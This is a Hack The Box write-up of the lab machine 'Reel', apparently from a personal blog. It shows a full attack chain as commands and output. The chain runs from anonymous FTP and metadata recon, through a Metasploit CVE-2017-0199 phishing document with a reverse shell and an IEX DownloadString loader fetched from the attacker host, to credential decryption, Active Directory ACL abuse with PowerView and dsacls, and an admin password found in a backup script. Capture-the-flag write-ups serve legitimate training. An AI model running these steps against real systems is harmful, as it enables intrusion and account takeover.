htb-reel-nl

Today we are going to solve another CTF challenge “Reel” which is available online for those who want to increase their skill in penetration testing. Reel is retried vulnerable lab presented by Hack the Box.Level: IntermediateTask: find user.txt and root.txt file on victim’s machine.Let’s begin with nmap port enumeration.

 

c:\Users\jacco>nmap -sC -sV 10.10.10.77
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-26 19:16 W. Europe Standard Time
Nmap scan report for 10.10.10.77
Host is up (0.028s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| |_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=2/26%Time=5C758296%P=i686-pc-windows-windows%r(
SF:NULL,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\
--snip--
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.32 seconds


Thats quite an interesting attack surface we have right here! There”s no web service listening on this box, so right away we see this isn”t going to be the typical webapp-exploit-then-root machine, which is cool!

Whenever I see FTPs, the first thing I always try is anonymous login, so lets go for that.

# ftp 10.10.10.77

Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-28-18  11:19PM       <DIR>          documents
226 Transfer complete.

Perfect! Let’s see what documents we can download:

ftp> cd documents
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-28-18  11:19PM                 2047 AppLocker.docx
05-28-18  01:01PM                  124 readme.txt
10-31-17  09:13PM                14581 Windows Event Forwarding.docx
226 Transfer complete.

After promptly getting the three files, we, as good kids, read the readme.txt first, because that is what we are supposed to do, right?

please email me any rtf format procedures - I'll review and convert.

new format / converted documents will be saved here.

Hmmm. Converting RTFs to what? DOCX maybe? Since the other documents in the directory are Microsoft Word documents, that seems a reasonable guess to make. Now, I am unable to read Windows Event Forwarding.docx, my LibreOffice spits out an error everytime I try, but I have more luck with AppLocker.docx. It says:

AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.

Ok, bad news. This probably means we will have to face AppLocker once we get a shell on the box. But we are far from that! So, now what?

The wonders of metadata

We have a good amount of information from our enumeration phase. Now it is time to craft a meticulously planned several-stage attack or to bang our heads against the machine until something works. Yay, hacking!

We know from our nmap scan that the server has an SMTP service listening at port 25, which kind of sticks out now because of the readme.txt we previously read. So maybe we are capable of using this SMTP server to send e-mails, but to whom?

Well, whoever wrote/converted the documents in the FTP server, she is probably a user of the machine and therefore a potential victim. So is there a chance her user account is somewhere in the generated documents?

Now, I have a confession to make. I dont usually add it to my writeups unless it gives some useful information, but I use exiftool on almost EVERYTHING I find during reconaissance when solving CTFs or doing pentest. Itís probably some kind of derangement that affected me after my first three or four CTF-like machines involved searching for metadata in images or documents.

So you can imagine I got really happy when I ran exiftool on the three documents and one of them was bingo:

# exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number         : 11.16
File Name                       : Windows Event Forwarding.docx
Directory                       : .
File Size                       : 14 kB
File Modification Date/Time     : 2018:09:21 14:53:40+02:00
File Access Date/Time           : 2018:10:21 10:43:29+02:00
File Inode Change Date/Time     : 2018:09:30 21:12:19+02:00
File Permissions                : rw-r--r--
File Type                       : DOCX
File Type Extension             : docx
MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version            : 20
Zip Bit Flag                    : 0x0006
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0x82872409
Zip Compressed Size             : 385
Zip Uncompressed Size           : 1422
Zip File Name                   : [Content_Types].xml
Creator                         : nico@megabank.com
Revision Number                 : 4
Create Date                     : 2017:10:31 18:42:00Z
Modify Date                     : 2017:10:31 18:51:00Z
Template                        : Normal.dotm
Total Edit Time                 : 5 minutes
Pages                           : 2
Words                           : 299
Characters                      : 1709
Application                     : Microsoft Office Word
Doc Security                    : None
Lines                           : 14
Paragraphs                      : 4
Scale Crop                      : No
Heading Pairs                   : Title, 1
Titles Of Parts                 :
Company                         :
Links Up To Date                : No
Characters With Spaces          : 2004
Shared Doc                      : No
Hyperlinks Changed              : No
App Version                     : 14.0000

Do you see that beautiful Creator field over there? We got an e-mail address, and probably a user of the box too!

Now I can actually make some kind of attack plan as if this was some cool heist movie (I know this is cheesy but don t ruin this for me ok?):

  1. Craft a malicious RTF document (research on how to this because I”ve never done something similar!)
  2. Use the SMTP service running on the box to send it to nico@megabank.com, hoping he’ll open it in a vulnerable Word version in order to convert it
  3. Wait patiently for the shell

Yeah, seems easy right? (Narrator: it was not)

Malicious documents

The first thing we should do is searching for a suitable (and somewhat recent) exploit that could affect nico when he opens our RTF document. Our best friend searchsploit to the rescue!

A quick inspection of the exploit file with searchsploit -x 41934 reveals the CVE field (2017-0199) which, apart from looking more recent, is a fantastic field for searching in Metasploit.

msf > search office_word_hta

Matching Modules
================

   Name                                        Disclosure Date  Rank       Check  Description
   ----                                        ---------------  ----       -----  -----------
   exploit/windows/fileformat/office_word_hta  2017-04-14       excellent  No     Microsoft Office Word Malicious Hta Execution


msf > use exploit/windows/fileformat/office_word_hta
msf exploit(windows/fileformat/office_word_hta) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(windows/fileformat/office_word_hta) > set srvhost 10.10.14.20
srvhost => 10.10.14.20
msf exploit(windows/fileformat/office_word_hta) > set lhost 10.10.14.20
lhost => 10.10.14.20
msf exploit(windows/fileformat/office_word_hta) > show options

Module options (exploit/windows/fileformat/office_word_hta):

Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.doc yes The file name.
SRVHOST 10.10.14.20 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH default.hta yes The URI to use for the HTA file


Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.20 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Microsoft Office Word

download hta from http://10.10.14.20:8080/default.hta and copy doc attachment to send

root@kali:~/htb/reel/2019# wget http://10.10.14.20:8080/default.hta
--2019-02-26 15:33:23--  http://10.10.14.20:8080/default.hta
Connecting to 10.10.14.20:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6361 (6.2K) [application/hta]
Saving to: ‘default.hta’

default.hta                                 100%[===============================================================================================>]   6.21K  --.-KB/s    in 0s      

2019-02-26 15:33:24 (746 MB/s) - ‘default.hta’ saved [6361/6361]

root@kali:~/htb/reel/2019# cp /root/.msf4/local/msf.doc .
root@kali:~/htb/reel/2019# cp ~/Downloads/default.hta .
root@kali:~/htb/reel/2019# ls
default.hta  msf.doc

send mail

root@kali:~/htb/reel/2019# ls
default.hta msf.doc
root@kali:~/htb/reel/2019# sendEmail -f puckie2@megabank.com -t nico@megabank.com -u RTF -m "2Please convert file" -a msf.doc -s 10.10.10.77
^CFeb 26 15:23:23 kali sendEmail[9312]: EXITING: Received SIGINT
root@kali:~/htb/reel/2019# sendEmail -f puckie3@megabank.com -t nico@megabank.com -u RTF -m "2Please convert file" -a msf.doc -s 10.10.10.77
Feb 26 15:23:51 kali sendEmail[9364]: Email was sent successfully!

catch shell

msf exploit(windows/fileformat/office_word_hta) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.10.14.20:4444 
[+] msf.doc stored at /root/.msf4/local/msf.doc
[*] Using URL: http://10.10.14.20:8080/default.hta
[*] Server started.
msf exploit(windows/fileformat/office_word_hta) > [*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.77



msf exploit(windows/fileformat/office_word_hta) > sessions -l

Active sessions
===============

  Id  Name  Type               Information                                                                       Connection
  --  ----  ----               -----------                                                                       ----------
  1         shell x86/windows  Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All righ...  10.10.14.20:4444 -> 10.10.10.77:57400 (10.10.10.77)

msf exploit(windows/fileformat/office_word_hta) > sessions -i 1
[*] Starting interaction with 1...

C:\Windows\system32>whoami
whoami
htb\nico

C:\Windows\system32>
alternative for generating RTF payload : python cve-2017-0199_toolkit.py -M gen -t RTF -w puckie.rtf -u http://10.10.14.20/puckie.ps1 -x 0

AppUnLocker

tom@REEL C:\Users\tom>sharphound.exe -c all 
This program is blocked by group policy. For more information, contact yo
ur system administrator.

There are different techniques on the web to work around AppLocker. They are gathered on this Github .
For more details many of these examples are described on the pentestlab blog .

It’s easier to get a basic reverse shell by calling a Powershell script without the ps1 extension:

Nico

We finally have a shell on this box. It’s going to be easy from here, right? Of course, that malicious document thing is the peak of difficulty of this machine, is it not? (Narrator: again, it was not)

Normally, my first serious move when landing on a Windows machine is running PowerUp.ps1, analyze the results and work from there. But, before that, I like to peek around, at least the home directory of the user I have accessed with. So, to C:\Users\nico\ we go!

In his Desktop, aside from the user.txt flag (yay!), thereis an interesting file called cred.xml:

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">HTB\Tom</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
    </Props>
  </Obj>
</Objs>

Hey, I know the type PSCredential! As the name of the file suggests, it probably contains credentials, and judging by its contents, they belong to the user tom. Thats great! Its only a matter of researching what type of file is this and how to obtain the plain-text password from it. After googling a little, two StackOverflow answers help me understand that this file is the XML representation of a serialized Powershell object, more specifically a PSCredential one. And that the Powershell command Import-Clixml can help us undoing the process:

nico@REEL C:\Users\nico\Desktop>powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Form
at-List *"

UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
Go On MoveThe most interesting once connected with Tom is the presence of a note left in an AD Audit folder

tom@REEL C:\Users\tom\Desktop\AD Audit>type note.txt
Findings:

Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).

Maybe we should re-run Cypher query against other groups we've created.

And in this folder is a copy of BloodHound waiting for us.

BloodHound is a tool that allows to make graphs of relationship between the different objects of an ActiveDirectory (users, groups, machines, etc) and thus to highlight the presence of problems of permission making it possible to trace up privileges of domain administrator. An explanatory video can be seen on YouTube .

Bloodhound has a graphic part. The other part is used to generate the CSVs from which the graphs will be generated:

tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors>powershell -nop -exec bypass

Windows PowerShell
Copyright (C) 2014 Microsoft Corporation. All rights reserved.

PS C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors> Import-Module .\SharpHound.ps1
PS C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors> Invoke-Bloodhound
Initializing BloodHound at 5:15 PM on 2/26/2019
Starting Default enumeration for HTB.LOCAL
Status: 29 objects enumerated (+29 Infinity/s --- Using 69 MB RAM )
Finished enumeration for HTB.LOCAL in 00:00:00.3830422
0 hosts failed ping. 0 hosts timedout.

PS C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors> dir

Directory: C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 11/16/2017 11:50 PM 112225 acls.csv
-a--- 2/26/2019 5:15 PM 4433 BloodHound.bin
-a--- 10/24/2017 4:27 PM 246489 BloodHound_Old.ps1
-a--- 2/26/2019 5:15 PM 4366 group_membership.csv
-a--- 2/26/2019 5:15 PM 179 local_admins.csv
-a--- 10/24/2017 4:27 PM 568832 SharpHound.exe
-a--- 10/24/2017 4:27 PM 636959 SharpHound.ps1
We can call more finely the module or launch more exhaustive. In any case, it generates CSV files in the current directory that is hastily repatriated to load in BloodHound that we have previously installed and configured .

BloodHound has a path search feature that here does not return anything from Tom to the Domain Admins group . But if we are interested in the rights we currently have it becomes interesting:
HackTheBox Reel Tom writeOwner Clear LDAP Bloodhound

Here we have the right writeOwner that defines who is the owner of the user Claire.
It’s also possible to find this relationship directly with PowerView:

tom@REEL C:\Users\tom>powershell -version 2 -nop -exec bypass
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\Users\tom\Desktop\AD Audit\Bloodhound> Import-Module .\PowerView.ps1


 

PS C:\Users\tom\Desktop\AD Audit\Bloodhound> Get-DomainObjectACL -Identity Claire -ResolveGUIDs

AceQualifier : AccessAllowed
InheritanceFlags : None
ObjectSID : S-1-5-21-2648318136-3688571242-2924127574-1130
IsCallback : False
AceType : AccessAllowedObject
AuditFlags : None
PropagationFlags : None
ObjectAceType : User-Account-Restrictions
OpaqueLength : 0
ActiveDirectoryRights : ReadProperty
AccessMask : 16
AceFlags : None
BinaryLength : 56
ObjectDN : CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL
InheritedObjectAceType : All
SecurityIdentifier : S-1-5-21-2648318136-3688571242-2924127574-553
ObjectAceFlags : ObjectAceTypePresent
IsInherited : False

To exploit this we use the PowerView Set-DomainObjectOwner command . It is documented on the blog of wald0 (one of the authors).

PowerSploit has reference documentation for the command.

tom@REEL C:\Users>powershell -version 2 -nop -exec bypass
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\Users>
PS C:\Users\tom\Desktop\AD Audit\BloodHound> Import-Module .\PowerView.ps1
PS C:\Users\tom\Desktop\AD Audit\BloodHound> Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
PS C:\Users\tom\Desktop\AD Audit\BloodHound> Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights A
ll
PS C:\Users\tom\Desktop\AD Audit\BloodHound> net user claire !l33tpassw0rd /domain
The command completed successfully.

PS C:\Users\tom\Desktop\AD Audit\BloodHound> net user Claire
User name claire
Full Name Claire Danes
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 2/26/2019 5:24:38 PM
Password expires Never
Password changeable 2/27/2019 5:24:38 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/29/2018 11:34:58 PM

Logon hours allowed All

Local Group Memberships *Hyper-V Administrator
Global Group memberships *Domain Users *MegaBank_Users
*DR_Site *Restrictions
The command completed successfully.

We agree here all rights on Claire. Note that recovering only the ResetPassword permission does not seem to be enough to change the password.

Raise Your Hands

By recovering access to Claire I expected that we can then jump to the account claire_da which is domain admin … But in fact no
Claire has permission writeDACL on the group backup admins:
HackTheBox Reel BloodHound Clear writeDACL on Backup Admins group LDAP

and this group has so to speak of nothing at all (there are only incoming relations).
HackTheBox BloodHound reel backup admins relationship graph LDAP

If we talk a little about this type of group we see that members usually have unrestricted access to the file system:

A built-in group. By default, the group has no members. Backup Operators can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to the computer and shut down.

We can then grant the privileges of adding a member and add us to the group:

PS C:\windows\temp> Add-DomainObjectAcl -TargetIdentity Backup_Admins -PrincipalIdentity claire -Rights WriteMembers
PS C:\windows\temp> net group Backup_Admins claire /add
The command completed successfully.
But disappointment: although one has the rights on the personal file of the administrator:
claire@REEL C:\Users>icacls Administrator
Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)
HTB\Backup_Admins:(OI)(CI)(F)
HTB\Administrator:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
Access to root.txt (the final flag) is denied us 🙁

Several Powershell scripts are present in a subfolder Backup Scripts and an archive BackupScript.zip .

I had the good idea to make a diff of the ps1 files present and those of the zip:

1
2
3
4
5
root@kali:~/Documents/reel/Backup Scripts$ diff BackupScript.ps1 yolo/BackupScript.ps1
1,2c1,41
< # admin password
< $password="Cr4ckMeIfYouC4n!"
--- snip ---

Claire

Ok, we are near! We only need to do something similar for the BACKUP_ADMINS group and see what being part of it means.

Of course, since we changed users, we need to load PowerView again:

> powershell
> IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.12.157/PowerView.ps1')

And again guided by the fantastic An Ace Up The Sleeve article, we can grant ourselves all ACL rights over BACKUP_ADMINS, since we have the WriteDacl permission:

> Add-DomainObjectACL -TargetIdentity 'Backup_Admins' -PrincipalIdentity claire -Rights All

With these rights, we should be able to add ourselves to the group:

> net group Backup_Admins /add claire

No errors, seems good! We can check it worked by running net user claire and seeing we are indeed a proud member of BACKUP_ADMINS. Great! Now what?

Note

At this point, while I was exploring Claire as a BACKUP_ADMINS member, other Hack The Box users were constantly resetting Claire’s password to other values, so if I logged out (you will see why in a moment) I couldn’t log back in. I ended up leaving Toms SSH session open and prepared a script to automate the process of resetting Claire’s password to the value I wanted so, if someone changed it, I could easily change it back. My ResetClairePassword.ps1 script was like this:

Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
$SecPasswd = ConvertTo-SecureString -String 's0mepassw0rd' -AsPlainText -Force
Set-ADAccountPassword -Reset -NewPassword $SecPasswd -Identity claire 

Backup Admin

Another shameful confession. I wasted a lot of time at this point, and it was pretty frustrating. It required a lot of work reaching to this point, and it seemed it was for nothing. I couldn’t access Administrator home directory, I couldn’t read or write new files compared to base Claire, BACKUP_ADMINS didn’t have any control over other AD objects according to BloodHound So, was all this work for nothing?!

Turns out you have to log out and log in again for group changes to take effect. Its something obvious, its something I knew from Linux (it works the same way there), but my tired brain couldn’t remember it and that meant a lot of frustration and wasted time wandering around. Lesson learned (even though I thought I already knew this): if you are tired, take a break! Even if you feel the victory so near you could touch it, working with a tired mind almost always doesn’t pay off.

Ok, after this dramatic complication, we can continue! Log out, log in again, and the group change takes effect. Now, as Claire, we can access C:\Users\Administrator. Finally!! Lets read root.txt and claim our well deserved prize:

claire@REEL C:\Users\Administrator\Desktop>type root.txt
Access is denied.

God dammit!

It couldn’t be that easy, right? It seems there are other things in Administrators Desktop. Lets see what this Backup Scripts folder is.

> cd "C:\Users\Administrator\Desktop\Backup Scripts"
> dir
  Volume in drive C has no label
  Volume Serial number is CC8A-33E1

  Directory of C:\Users\Administrator\Desktop\Backup Scripts

11/02/2017	09:47 PM	<DIR>		.
11/02/2017	09:47 PM	<DIR>		..
11/03/2017	11:22 PM		    845	backup.ps1
11/02/2017	09:37 PM		    462	backup1.ps1
11/03/2017	11:21 PM		  5,642	BackupScript.ps1
11/02/2017	09:43 PM		  2,791	BackupScript.zip
11/03/2017	11:22 PM		  1,855	folders-system-state.txt
11/03/2017	11:22 PM		    308	test2.ps1.txt
		    6 File(s)		  11,903 bytes
		    2 Dir(s)      15,719,768,064 bytes free

Alright, its just digging work at this point. After reviewing these scripts one by one (which seem to be used to automate the backup process of some directories of the box), we finally find what we are looking for:

> type BackupScript.ps1
# admin password                                                                                                
$password="Cr4ckMeIfYouC4n!" 
[...]

Is this it? Are we done?

PS C:\Users\jacco> ssh Administrator@10.10.10.77
Administrator@10.10.10.77's password:Cr4ckMeIfYouC4n! Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. administrator@REEL C:\Users\Administrator>cd Desktop administrator@REEL C:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is CC8A-33E1 Directory of C:\Users\Administrator\Desktop 21/01/2018 14:56 <DIR> . 21/01/2018 14:56 <DIR> .. 02/11/2017 21:47 <DIR> Backup Scripts 28/10/2017 11:56 32 root.txt 1 File(s) 32 bytes 3 Dir(s) 15,675,449,344 bytes free administrator@REEL C:\Users\Administrator\Desktop>type root.txt 101*****32a

The DACLS way instead of powerview.ps1

Tom take over claire: Grant Generic all to Tom and allow him to change Claire password
https://ss64.com/nt/dsacls.html
dsacls "CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL" /takeownership &&
dsacls "CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL" /G tom:GA &&
dsacls "CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL" /G "tom:CA;Reset Password"

Now change claire password to Password!

Powershell Set-ADAccountPassword -Reset -NewPassword (ConvertTo-SecureString -String 'Password1!' -AsPlainText -Force) -Identity Claire

Login as Claire and Grant Tom access to Backup_Admins
Powershell Add-ADGroupmember -Identity Backup_Admins -Members tom

login as tom
net user tom

Regards Puckie
Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *